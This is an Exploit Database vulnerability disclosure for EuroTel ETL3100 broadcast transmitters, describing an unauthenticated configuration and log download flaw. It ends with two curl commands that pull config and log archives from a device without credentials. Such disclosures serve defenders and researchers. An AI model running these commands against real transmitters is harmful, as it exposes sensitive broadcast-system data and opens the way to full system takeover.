EuroTel ETL3100 – Transmitter Unauthenticated Config/Log Download

• Exploit Database
• 16 阅读

• 作者： LiquidWorm
  日期： 2023-08-21
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51686/

• # Exploit Title: EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download
  # Exploit Author: LiquidWorm
  
  Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
  Product web page: https://www.eurotel.it | https://www.siel.fm
  Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) 
  v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
  
  
  Summary: RF Technology For Television Broadcasting Applications.
  The Series ETL3100 Radio Transmitter provides all the necessary
  features defined by the FM and DAB standards. Two bands are provided
  to easily complain with analog and digital DAB standard. The Series
  ETL3100 Television Transmitter provides all the necessary features
  defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
  well as the analog TV standards. Three band are provided to easily
  complain with all standard channels, and switch softly from analog-TV
  'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
  
  Desc: The TV and FM transmitter suffers from an unauthenticated
  configuration and log download vulnerability. This will enable
  the attacker to disclose sensitive information and help him in
  authentication bypass, privilege escalation and full system access.
  
  Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
   lighttpd/1.4.26
   PHP/5.4.3
   Xilinx Virtex Machine
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2023-5784
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php
  
  
  29.04.2023
  
  --
  
  
  $ curl http://192.168.2.166/cfg_download.php -o config.tgz
  $ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz